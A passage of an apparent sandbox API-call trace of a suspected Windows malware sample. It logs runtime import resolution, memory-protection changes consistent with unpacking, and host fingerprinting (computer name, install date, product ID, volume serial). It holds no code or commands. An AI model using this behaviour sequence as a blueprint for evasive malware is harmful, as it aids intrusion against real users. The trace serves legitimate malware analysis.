(lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0312.793] SetErrorMode (uMode=0x0) returned 0x8001 [0312.793] GetProcAddress (hModule=0x77740000, lpProcName="CryptHashData") returned 0x7774df36 [0312.793] SetErrorMode (uMode=0x8001) returned 0x0 [0312.793] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0312.793] SetErrorMode (uMode=0x0) returned 0x8001 [0312.793] GetProcAddress (hModule=0x77740000, lpProcName="SetSecurityDescriptorSacl") returned 0x77754680 [0312.793] SetErrorMode (uMode=0x8001) returned 0x0 [0312.793] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0312.794] SetErrorMode (uMode=0x0) returned 0x8001 [0312.794] GetProcAddress (hModule=0x77740000, lpProcName="RegSetValueExW") returned 0x777514d6 [0312.794] SetErrorMode (uMode=0x8001) returned 0x0 [0312.794] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0312.794] SetErrorMode (uMode=0x0) returned 0x8001 [0312.794] GetProcAddress (hModule=0x77740000, lpProcName="CryptDestroyHash") returned 0x7774df66 [0312.794] SetErrorMode (uMode=0x8001) returned 0x0 [0312.794] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0312.794] SetErrorMode (uMode=0x0) returned 0x8001 [0312.794] GetProcAddress (hModule=0x77740000, lpProcName="OpenProcessToken") returned 0x77754304 [0312.794] SetErrorMode (uMode=0x8001) returned 0x0 [0312.794] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0312.794] SetErrorMode (uMode=0x0) returned 0x8001 [0312.794] GetProcAddress (hModule=0x77740000, lpProcName="FreeSid") returned 0x7775412e [0312.794] SetErrorMode (uMode=0x8001) returned 0x0 [0312.794] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0312.794] SetErrorMode (uMode=0x0) returned 0x8001 [0312.795] GetProcAddress (hModule=0x77740000, lpProcName="InitializeSecurityDescriptor") returned 0x77754620 [0312.795] SetErrorMode (uMode=0x8001) returned 0x0 [0312.795] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0312.795] SetErrorMode (uMode=0x0) returned 0x8001 [0312.795] GetProcAddress (hModule=0x77740000, lpProcName="RegOpenKeyExW") returned 0x7775468d [0312.795] SetErrorMode (uMode=0x8001) returned 0x0 [0312.795] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0312.795] SetErrorMode (uMode=0x0) returned 0x8001 [0312.795] GetProcAddress (hModule=0x77740000, lpProcName="CryptImportKey") returned 0x7774c532 [0312.795] SetErrorMode (uMode=0x8001) returned 0x0 [0312.795] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0312.795] SetErrorMode (uMode=0x0) returned 0x8001 [0312.795] GetProcAddress (hModule=0x77740000, lpProcName="ConvertStringSecurityDescriptorToSecurityDescriptorW") returned 0x77751f59 [0312.795] SetErrorMode (uMode=0x8001) returned 0x0 [0312.795] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0312.795] SetErrorMode (uMode=0x0) returned 0x8001 [0312.796] GetProcAddress (hModule=0x77740000, lpProcName="OpenThreadToken") returned 0x7775432c [0312.796] SetErrorMode (uMode=0x8001) returned 0x0 [0312.796] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0312.796] SetErrorMode (uMode=0x0) returned 0x8001 [0312.796] GetProcAddress (hModule=0x77740000, lpProcName="RegQueryValueExW") returned 0x777546ad [0312.796] SetErrorMode (uMode=0x8001) returned 0x0 [0312.796] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0312.796] SetErrorMode (uMode=0x0) returned 0x8001 [0312.796] GetProcAddress (hModule=0x77740000, lpProcName="CryptReleaseContext") returned 0x7774e124 [0312.796] SetErrorMode (uMode=0x8001) returned 0x0 [0312.796] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0312.796] SetErrorMode (uMode=0x0) returned 0x8001 [0312.796] GetProcAddress (hModule=0x77740000, lpProcName="GetTokenInformation") returned 0x7775431c [0312.796] SetErrorMode (uMode=0x8001) returned 0x0 [0312.796] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0312.796] SetErrorMode (uMode=0x0) returned 0x8001 [0312.796] GetProcAddress (hModule=0x77740000, lpProcName="CryptDestroyKey") returned 0x7774c51a [0312.796] SetErrorMode (uMode=0x8001) returned 0x0 [0312.797] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0312.797] SetErrorMode (uMode=0x0) returned 0x8001 [0312.797] GetProcAddress (hModule=0x77740000, lpProcName="AdjustTokenPrivileges") returned 0x7775418e [0312.797] SetErrorMode (uMode=0x8001) returned 0x0 [0312.797] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0312.797] SetErrorMode (uMode=0x0) returned 0x8001 [0312.797] GetProcAddress (hModule=0x77740000, lpProcName="SetSecurityDescriptorDacl") returned 0x7775415e [0312.797] SetErrorMode (uMode=0x8001) returned 0x0 [0312.797] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0312.797] SetErrorMode (uMode=0x0) returned 0x8001 [0312.797] GetProcAddress (hModule=0x77740000, lpProcName="GetSecurityDescriptorSacl") returned 0x77754608 [0312.797] SetErrorMode (uMode=0x8001) returned 0x0 [0312.797] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0312.797] SetErrorMode (uMode=0x0) returned 0x8001 [0312.797] GetProcAddress (hModule=0x77740000, lpProcName="LookupPrivilegeValueW") returned 0x777541b3 [0312.797] SetErrorMode (uMode=0x8001) returned 0x0 [0312.797] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0312.798] SetErrorMode (uMode=0x0) returned 0x8001 [0312.798] GetProcAddress (hModule=0x77740000, lpProcName="GetLengthSid") returned 0x7775413b [0312.798] SetErrorMode (uMode=0x8001) returned 0x0 [0312.798] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0312.798] SetErrorMode (uMode=0x0) returned 0x8001 [0312.798] GetProcAddress (hModule=0x77740000, lpProcName="RegDeleteValueW") returned 0x7774cf31 [0312.798] SetErrorMode (uMode=0x8001) returned 0x0 [0312.798] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0312.798] SetErrorMode (uMode=0x0) returned 0x8001 [0312.798] GetProcAddress (hModule=0x77740000, lpProcName="RegFlushKey") returned 0x7776773f [0312.798] SetErrorMode (uMode=0x8001) returned 0x0 [0312.798] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0312.798] SetErrorMode (uMode=0x0) returned 0x8001 [0312.798] GetProcAddress (hModule=0x77740000, lpProcName="RegNotifyChangeKeyValue") returned 0x7774e15b [0312.798] SetErrorMode (uMode=0x8001) returned 0x0 [0312.798] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0312.798] SetErrorMode (uMode=0x0) returned 0x8001 [0312.799] GetProcAddress (hModule=0x77740000, lpProcName="RegQueryInfoKeyW") returned 0x777546e7 [0312.799] SetErrorMode (uMode=0x8001) returned 0x0 [0312.799] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0312.799] SetErrorMode (uMode=0x0) returned 0x8001 [0312.799] GetProcAddress (hModule=0x77740000, lpProcName="RegEnumKeyW") returned 0x7775445b [0312.799] SetErrorMode (uMode=0x8001) returned 0x0 [0312.799] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0312.799] SetErrorMode (uMode=0x0) returned 0x8001 [0312.799] GetProcAddress (hModule=0x77740000, lpProcName="InitiateSystemShutdownExW") returned 0x7779db3a [0312.799] SetErrorMode (uMode=0x8001) returned 0x0 [0312.799] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0312.799] SetErrorMode (uMode=0x0) returned 0x8001 [0312.799] GetProcAddress (hModule=0x77740000, lpProcName="CryptAcquireContextW") returned 0x7774df14 [0312.799] SetErrorMode (uMode=0x8001) returned 0x0 [0312.799] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x76a70000 [0312.799] SetErrorMode (uMode=0x0) returned 0x8001 [0312.800] GetProcAddress (hModule=0x76a70000, lpProcName="ShellExecuteW") returned 0x76a83c71 [0312.800] SetErrorMode (uMode=0x8001) returned 0x0 [0312.800] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x76a70000 [0312.800] SetErrorMode (uMode=0x0) returned 0x8001 [0312.800] GetProcAddress (hModule=0x76a70000, lpProcName="ShellExecuteExW") returned 0x76a91e46 [0312.800] SetErrorMode (uMode=0x8001) returned 0x0 [0312.800] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x76a70000 [0312.800] SetErrorMode (uMode=0x0) returned 0x8001 [0312.800] GetProcAddress (hModule=0x76a70000, lpProcName="SHGetFolderPathW") returned 0x76af5708 [0312.800] SetErrorMode (uMode=0x8001) returned 0x0 [0312.800] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0312.800] SetErrorMode (uMode=0x0) returned 0x8001 [0312.800] GetProcAddress (hModule=0x76370000, lpProcName="PathFileExistsW") returned 0x763845bf [0312.800] SetErrorMode (uMode=0x8001) returned 0x0 [0312.800] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0312.800] SetErrorMode (uMode=0x0) returned 0x8001 [0312.801] GetProcAddress (hModule=0x76370000, lpProcName="PathIsURLW") returned 0x763855bf [0312.801] SetErrorMode (uMode=0x8001) returned 0x0 [0312.801] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0312.801] SetErrorMode (uMode=0x0) returned 0x8001 [0312.801] GetProcAddress (hModule=0x76370000, lpProcName="PathIsDirectoryEmptyW") returned 0x763acd81 [0312.801] SetErrorMode (uMode=0x8001) returned 0x0 [0312.801] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0312.801] SetErrorMode (uMode=0x0) returned 0x8001 [0312.801] GetProcAddress (hModule=0x76370000, lpProcName="StrCmpNIW") returned 0x76384745 [0312.801] SetErrorMode (uMode=0x8001) returned 0x0 [0312.801] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0312.801] SetErrorMode (uMode=0x0) returned 0x8001 [0312.801] GetProcAddress (hModule=0x76370000, lpProcName="PathRenameExtensionW") returned 0x763ad32a [0312.801] SetErrorMode (uMode=0x8001) returned 0x0 [0312.801] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0312.801] SetErrorMode (uMode=0x0) returned 0x8001 [0312.801] GetProcAddress (hModule=0x76370000, lpProcName="StrStrIW") returned 0x763846e9 [0312.801] SetErrorMode (uMode=0x8001) returned 0x0 [0312.802] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0312.802] SetErrorMode (uMode=0x0) returned 0x8001 [0312.802] GetProcAddress (hModule=0x76370000, lpProcName="PathMatchSpecW") returned 0x763886f7 [0312.802] SetErrorMode (uMode=0x8001) returned 0x0 [0312.802] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0312.802] SetErrorMode (uMode=0x0) returned 0x8001 [0312.802] GetProcAddress (hModule=0x76370000, lpProcName="PathCombineW") returned 0x7638c39c [0312.802] SetErrorMode (uMode=0x8001) returned 0x0 [0312.802] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0312.802] SetErrorMode (uMode=0x0) returned 0x8001 [0312.802] GetProcAddress (hModule=0x76370000, lpProcName="PathRemoveFileSpecW") returned 0x76383248 [0312.802] SetErrorMode (uMode=0x8001) returned 0x0 [0312.802] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0312.802] SetErrorMode (uMode=0x0) returned 0x8001 [0312.802] GetProcAddress (hModule=0x76370000, lpProcName="PathAddBackslashW") returned 0x7638c177 [0312.802] SetErrorMode (uMode=0x8001) returned 0x0 [0312.802] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0312.803] SetErrorMode (uMode=0x0) returned 0x8001 [0312.803] GetProcAddress (hModule=0x76370000, lpProcName="wvnsprintfW") returned 0x763b066c [0312.803] SetErrorMode (uMode=0x8001) returned 0x0 [0312.803] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0312.803] SetErrorMode (uMode=0x0) returned 0x8001 [0312.803] GetProcAddress (hModule=0x76370000, lpProcName="PathUnquoteSpacesW") returned 0x76385331 [0312.803] SetErrorMode (uMode=0x8001) returned 0x0 [0312.803] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0312.803] SetErrorMode (uMode=0x0) returned 0x8001 [0312.803] GetProcAddress (hModule=0x76370000, lpProcName="PathSkipRootW") returned 0x7639fbf5 [0312.803] SetErrorMode (uMode=0x8001) returned 0x0 [0312.803] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0312.803] SetErrorMode (uMode=0x0) returned 0x8001 [0312.804] GetProcAddress (hModule=0x76370000, lpProcName="PathFindExtensionW") returned 0x7638a1b9 [0312.804] SetErrorMode (uMode=0x8001) returned 0x0 [0312.804] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0312.804] SetErrorMode (uMode=0x0) returned 0x8001 [0312.804] GetProcAddress (hModule=0x76370000, lpProcName="SHDeleteValueW") returned 0x7637fcca [0312.804] SetErrorMode (uMode=0x8001) returned 0x0 [0312.804] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0312.804] SetErrorMode (uMode=0x0) returned 0x8001 [0312.804] GetProcAddress (hModule=0x76370000, lpProcName="wvnsprintfA") returned 0x7639edfe [0312.804] SetErrorMode (uMode=0x8001) returned 0x0 [0312.804] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0312.804] SetErrorMode (uMode=0x0) returned 0x8001 [0312.804] GetProcAddress (hModule=0x76370000, lpProcName="PathIsDirectoryW") returned 0x7637ff07 [0312.804] SetErrorMode (uMode=0x8001) returned 0x0 [0312.805] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0312.805] SetErrorMode (uMode=0x0) returned 0x8001 [0312.805] GetProcAddress (hModule=0x76370000, lpProcName="PathRemoveBackslashW") returned 0x76385c62 [0312.805] SetErrorMode (uMode=0x8001) returned 0x0 [0312.805] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0312.805] SetErrorMode (uMode=0x0) returned 0x8001 [0312.805] GetProcAddress (hModule=0x76370000, lpProcName="UrlUnescapeA") returned 0x7639c6fb [0312.805] SetErrorMode (uMode=0x8001) returned 0x0 [0312.805] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0312.805] SetErrorMode (uMode=0x0) returned 0x8001 [0312.805] GetProcAddress (hModule=0x76370000, lpProcName="PathQuoteSpacesW") returned 0x763ace21 [0312.805] SetErrorMode (uMode=0x8001) returned 0x0 [0312.805] LoadLibraryA (lpLibFileName="PSAPI.DLL") returned 0x75ad0000 [0312.806] SetErrorMode (uMode=0x0) returned 0x8001 [0312.806] GetProcAddress (hModule=0x75ad0000, lpProcName="GetModuleFileNameExW") returned 0x75ad13f0 [0312.806] SetErrorMode (uMode=0x8001) returned 0x0 [0312.806] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x75ae0000 [0312.806] SetErrorMode (uMode=0x0) returned 0x8001 [0312.806] GetProcAddress (hModule=0x75ae0000, lpProcName="CLSIDFromString") returned 0x75afe599 [0312.806] SetErrorMode (uMode=0x8001) returned 0x0 [0312.806] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x75ae0000 [0312.806] SetErrorMode (uMode=0x0) returned 0x8001 [0312.806] GetProcAddress (hModule=0x75ae0000, lpProcName="CoInitializeEx") returned 0x75b209ad [0312.806] SetErrorMode (uMode=0x8001) returned 0x0 [0312.806] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x75ae0000 [0312.806] SetErrorMode (uMode=0x0) returned 0x8001 [0312.806] GetProcAddress (hModule=0x75ae0000, lpProcName="CreateStreamOnHGlobal") returned 0x75b0363b [0312.806] SetErrorMode (uMode=0x8001) returned 0x0 [0312.806] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x75ae0000 [0312.807] SetErrorMode (uMode=0x0) returned 0x8001 [0312.807] GetProcAddress (hModule=0x75ae0000, lpProcName="CoSetProxyBlanket") returned 0x75af5ea5 [0312.807] SetErrorMode (uMode=0x8001) returned 0x0 [0312.807] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x75ae0000 [0312.807] SetErrorMode (uMode=0x0) returned 0x8001 [0312.807] GetProcAddress (hModule=0x75ae0000, lpProcName="CoCreateInstance") returned 0x75b29d0b [0312.807] SetErrorMode (uMode=0x8001) returned 0x0 [0312.807] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x75ae0000 [0312.807] SetErrorMode (uMode=0x0) returned 0x8001 [0312.807] GetProcAddress (hModule=0x75ae0000, lpProcName="CoUninitialize") returned 0x75b286d3 [0312.807] SetErrorMode (uMode=0x8001) returned 0x0 [0312.807] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x76950000 [0312.807] SetErrorMode (uMode=0x0) returned 0x8001 [0312.807] GetProcAddress (hModule=0x76950000, lpProcName="DeleteObject") returned 0x76965689 [0312.807] SetErrorMode (uMode=0x8001) returned 0x0 [0312.807] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x76950000 [0312.808] SetErrorMode (uMode=0x0) returned 0x8001 [0312.808] GetProcAddress (hModule=0x76950000, lpProcName="GetDeviceCaps") returned 0x76964de0 [0312.808] SetErrorMode (uMode=0x8001) returned 0x0 [0312.808] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x76950000 [0312.808] SetErrorMode (uMode=0x0) returned 0x8001 [0312.808] GetProcAddress (hModule=0x76950000, lpProcName="CreateDCW") returned 0x7696e743 [0312.808] SetErrorMode (uMode=0x8001) returned 0x0 [0312.808] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x76950000 [0312.808] SetErrorMode (uMode=0x0) returned 0x8001 [0312.808] GetProcAddress (hModule=0x76950000, lpProcName="CreateCompatibleDC") returned 0x769654f4 [0312.808] SetErrorMode (uMode=0x8001) returned 0x0 [0312.808] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x76950000 [0312.808] SetErrorMode (uMode=0x0) returned 0x8001 [0312.808] GetProcAddress (hModule=0x76950000, lpProcName="SelectObject") returned 0x76964f70 [0312.808] SetErrorMode (uMode=0x8001) returned 0x0 [0312.808] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x76950000 [0312.808] SetErrorMode (uMode=0x0) returned 0x8001 [0312.809] GetProcAddress (hModule=0x76950000, lpProcName="CreateCompatibleBitmap") returned 0x76965f49 [0312.809] SetErrorMode (uMode=0x8001) returned 0x0 [0312.809] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x76950000 [0312.809] SetErrorMode (uMode=0x0) returned 0x8001 [0312.809] GetProcAddress (hModule=0x76950000, lpProcName="BitBlt") returned 0x76965ea6 [0312.809] SetErrorMode (uMode=0x8001) returned 0x0 [0312.809] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x76950000 [0312.809] SetErrorMode (uMode=0x0) returned 0x8001 [0312.809] GetProcAddress (hModule=0x76950000, lpProcName="DeleteDC") returned 0x769658b3 [0312.809] SetErrorMode (uMode=0x8001) returned 0x0 [0312.809] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75f20000 [0312.811] SetErrorMode (uMode=0x0) returned 0x8001 [0312.811] GetProcAddress (hModule=0x75f20000, lpProcName="InternetConnectA") returned 0x75f449e9 [0312.811] SetErrorMode (uMode=0x8001) returned 0x0 [0312.811] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75f20000 [0312.811] SetErrorMode (uMode=0x0) returned 0x8001 [0312.811] GetProcAddress (hModule=0x75f20000, lpProcName="InternetReadFile") returned 0x75f3b406 [0312.811] SetErrorMode (uMode=0x8001) returned 0x0 [0312.811] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75f20000 [0312.812] SetErrorMode (uMode=0x0) returned 0x8001 [0312.812] GetProcAddress (hModule=0x75f20000, lpProcName="HttpQueryInfoA") returned 0x75f3a33e [0312.812] SetErrorMode (uMode=0x8001) returned 0x0 [0312.812] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75f20000 [0312.812] SetErrorMode (uMode=0x0) returned 0x8001 [0312.812] GetProcAddress (hModule=0x75f20000, lpProcName="InternetQueryOptionA") returned 0x75f31b56 [0312.812] SetErrorMode (uMode=0x8001) returned 0x0 [0312.812] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75f20000 [0312.812] SetErrorMode (uMode=0x0) returned 0x8001 [0312.812] GetProcAddress (hModule=0x75f20000, lpProcName="HttpOpenRequestA") returned 0x75f44c7d [0312.812] SetErrorMode (uMode=0x8001) returned 0x0 [0312.812] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75f20000 [0312.812] SetErrorMode (uMode=0x0) returned 0x8001 [0312.812] GetProcAddress (hModule=0x75f20000, lpProcName="InternetCrackUrlA") returned 0x75f2d075 [0312.812] SetErrorMode (uMode=0x8001) returned 0x0 [0312.812] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75f20000 [0312.812] SetErrorMode (uMode=0x0) returned 0x8001 [0312.813] GetProcAddress (hModule=0x75f20000, lpProcName="InternetSetOptionA") returned 0x75f375e8 [0312.813] SetErrorMode (uMode=0x8001) returned 0x0 [0312.813] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75f20000 [0312.813] SetErrorMode (uMode=0x0) returned 0x8001 [0312.813] GetProcAddress (hModule=0x75f20000, lpProcName="InternetOpenA") returned 0x75f4f18e [0312.813] SetErrorMode (uMode=0x8001) returned 0x0 [0312.813] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75f20000 [0312.813] SetErrorMode (uMode=0x0) returned 0x8001 [0312.813] GetProcAddress (hModule=0x75f20000, lpProcName="InternetCloseHandle") returned 0x75f3ab49 [0312.813] SetErrorMode (uMode=0x8001) returned 0x0 [0312.813] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75f20000 [0312.813] SetErrorMode (uMode=0x0) returned 0x8001 [0312.813] GetProcAddress (hModule=0x75f20000, lpProcName="HttpSendRequestA") returned 0x75fb18f8 [0312.813] SetErrorMode (uMode=0x8001) returned 0x0 [0312.813] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x76690000 [0312.813] SetErrorMode (uMode=0x0) returned 0x8001 [0312.814] GetProcAddress (hModule=0x76690000, lpProcName="ObtainUserAgentString") returned 0x766c1d76 [0312.814] SetErrorMode (uMode=0x8001) returned 0x0 [0312.814] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x761b0000 [0312.814] SetErrorMode (uMode=0x0) returned 0x8001 [0312.814] GetProcAddress (hModule=0x761b0000, lpProcName=0x9) returned 0x761b3eae [0312.814] SetErrorMode (uMode=0x8001) returned 0x0 [0312.814] LoadLibraryA (lpLibFileName="Secur32.dll") returned 0x75690000 [0312.817] SetErrorMode (uMode=0x0) returned 0x8001 [0312.817] GetProcAddress (hModule=0x75690000, lpProcName="GetUserNameExW") returned 0x7582a415 [0312.817] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x72940000, dwSize=0x120000, flNewProtect=0x40, lpflOldProtect=0x34a0c00 | out: lpflOldProtect=0x34a0c00*=0x2) returned 1 [0312.819] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x401000, dwSize=0xf20f, flNewProtect=0x20, lpflOldProtect=0x34a0c00 | out: lpflOldProtect=0x34a0c00*=0x40) returned 1 [0312.819] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x411000, dwSize=0x2bfe, flNewProtect=0x4, lpflOldProtect=0x34a0c00 | out: lpflOldProtect=0x34a0c00*=0x40) returned 1 [0312.819] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x414000, dwSize=0x696c, flNewProtect=0x4, lpflOldProtect=0x34a0c00 | out: lpflOldProtect=0x34a0c00*=0x40) returned 1 [0312.819] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x41b000, dwSize=0xc08, flNewProtect=0x4, lpflOldProtect=0x34a0c00 | out: lpflOldProtect=0x34a0c00*=0x40) returned 1 [0312.819] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x400000, dwSize=0x400, flNewProtect=0x2, lpflOldProtect=0x34a0c00 | out: lpflOldProtect=0x34a0c00*=0x40) returned 1 [0312.819] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0312.819] GetCurrentProcessId () returned 0x6a4 [0312.820] CryptAcquireContextW (in: phProv=0x417e5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x417e5c*=0x32eda8) returned 1 [0312.870] RtlAddVectoredExceptionHandler (FirstHandler=0x1, VectoredHandler=0x4084e9) returned 0x32d6c8 [0312.870] GetComputerNameW (in: lpBuffer=0x18fcc8, nSize=0x18fcac | out: lpBuffer="YKYD69Q", nSize=0x18fcac) returned 1 [0312.870] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x1, phkResult=0x18fc80 | out: phkResult=0x18fc80*=0x134) returned 0x0 [0312.870] RegQueryValueExW (in: hKey=0x134, lpValueName="InstallDate", lpReserved=0x0, lpType=0x18fcb4, lpData=0x18fcb0, lpcbData=0x18fc7c*=0x4 | out: lpType=0x18fcb4*=0x4, lpData=0x18fcb0*=0x0, lpcbData=0x18fc7c*=0x4) returned 0x0 [0312.870] RegCloseKey (hKey=0x134) returned 0x0 [0312.870] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x1, phkResult=0x18fc84 | out: phkResult=0x18fc84*=0x134) returned 0x0 [0312.870] RegQueryValueExW (in: hKey=0x134, lpValueName="DigitalProductId", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x18fc98*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x18fc98*=0x0) returned 0x2 [0312.870] RegCloseKey (hKey=0x134) returned 0x0 [0312.871] GetVersionExW (in: lpVersionInformation=0x18fd08*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18fd08*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0312.871] GlobalMemoryStatusEx (in: lpBuffer=0x18fe60 | out: lpBuffer=0x18fe60) returned 1 [0312.871] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18fe38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18fe38*=0x705ba84c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0312.871] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18ff68 | out: Wow64Process=0x18ff68) returned 1 [0312.871] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x4177f0, dwRevision=0x1 | out: pSecurityDescriptor=0x4177f0) returned 1 [0312.871] SetSecurityDescriptorDacl (in: pSecurityDescriptor=0x4177f0, bDaclPresent=1, pDacl=0x0, bDaclDefaulted=0 | out: pSecurityDescriptor=0x4177f0) returned 1 [0312.871] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0312.872] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x32c648, lpbSaclPresent=0x18f4e0, pSacl=0x18f4e8, lpbSaclDefaulted=0x18f4e4 | out: lpbSaclPresent=0x18f4e0, pSacl=0x18f4e8, lpbSaclDefaulted=0x18f4e4) returned 1 [0312.872] SetSecurityDescriptorSacl (in: pSecurityDescriptor=0x4177f0, bSaclPresent=1, pSacl=0x32c65c, bSaclDefaulted=0 | out: pSecurityDescriptor=0x4177f0) returned 1 [0312.872] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0x18f220 | out: pszPath="C:\\Windows") returned 0x0 [0312.873] PathAddBackslashW (in: pszPath="C:\\Windows" | out: pszPath="C:\\Windows\\") returned="" [0312.873] GetVolumeNameForVolumeMountPointW (in: lpszVolumeMountPoint="C:\\Windows\\", lpszVolumeName=0x18f428, cchBufferLength=0x64 | out: lpszVolumeName="") returned 0 [0312.873] PathRemoveBackslashW (in: pszPath="C:\\Windows\\" | out: pszPath="C:\\Windows") returned="" [0312.873] PathRemoveFileSpecW (in: pszPath="C:\\Windows" | out: pszPath="C:\\") returned 1 [0312.873] PathAddBackslashW (in: pszPath="C:\\" | out: pszPath="C:\\") returned="" [0312.873] GetVolumeNameForVolumeMountPointW (in: lpszVolumeMountPoint="C:\\", lpszVolumeName=0x18f428, cchBufferLength=0x64 | out: lpszVolumeName="\\\\?\\Volume{bb11c9c2-5dad-11e7-a275-806e6f6e6963}\\") returned 1 